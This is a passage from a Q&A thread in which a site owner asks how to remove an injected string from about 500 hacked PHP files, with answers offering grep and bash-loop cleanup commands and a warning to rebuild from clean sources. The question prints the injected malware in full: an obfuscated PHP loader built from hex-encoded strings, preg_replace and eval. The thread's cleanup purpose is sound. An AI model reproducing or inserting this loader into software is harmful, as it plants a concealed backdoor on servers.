chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\57\x2a\40\x74\150\x6f\157\x63\172\x77\144\x78\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x32\71\x35\55\x32\60\x33\51\x29\54\x20\153\x73\143\x70\167\x78\172\x75\150\x72\50\x24\151\x62\156\x75\167\x67\162\x61\157\x64\54\x24\172\x64\163\x6e\160\x62\172\x67\150\x65\51\x29\51\x3b\40\x2f\52\x20\156\x6f\153\x7a\142\x6d\165\x76\165\x6e\40\x2a\57\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>//' *.php
```

This gives me the error:

> bash: syntax error near unexpected token `)'

Due to special characters. I want to match the exact string

Comment: complete line ? try copy pasting it in a file and then use sed.

Comment: You say "whatever I write ends up failing".  Please show us an example of what you wrote, and tell us how it failed.  Then we can go from there.

Comment: I don't want to replace the complete line, just that exact string. 1 moment I will edit it with the command I tried

Comment: My expected output is the original files without the malicious code on top.

Comment: Even if you did this your server will **not** be safe, secure, or at all trustable again. You **cannot** clean up from a hack at all reasonably. You **must** start again from known good sources.

Comment: Etan: thats the next step.

Answer (score 2, accepted):

You can do this:

First put the string in a file (remove.txt), then run this code:

```
echo "$(grep -vFf remove.txt phpmainfile.php)" >phpmainfile.php
```

This will overwrite `phpmainfile.php`.
To check if it works, dump the output into another file or omit the redirection to print on stdout or make a backup.

If you want to do this recursively then you can use a for loop to process each file like this:

```
for file in folderpath/*.php;do
echo "$(grep -vFf remove.txt "$file")" >"$file"
done
```

If you want to do this recursively in subdirectories too, then:

```
shopt -s globstar
for file in folderpath/*.php folderpath/**/*.php;do
...
```

Comment: Theres like 500 different files that this effects. I need to have it do this recursively

Comment: @user1797484 Then use a loop to process each file

Comment: may need to be recursive in which case `find [DIR] -type f -name "*.php"` may come in handy

Comment: are you sure this will work? i think the first thing shell would do once it encounters `>` is to clear out the file first. btw, in bash 4, recursive wildcard is available as `**`.

Comment: @HuStmpHrrr ,yap pretty much (I have tested this way of overwrite many times). And if you are being skeptical, you can always put them into another file/directory and then replace.

Comment: That loop is not processing sub directories

Comment: @user1797484 updated, you can use recursive wildcard `**` for that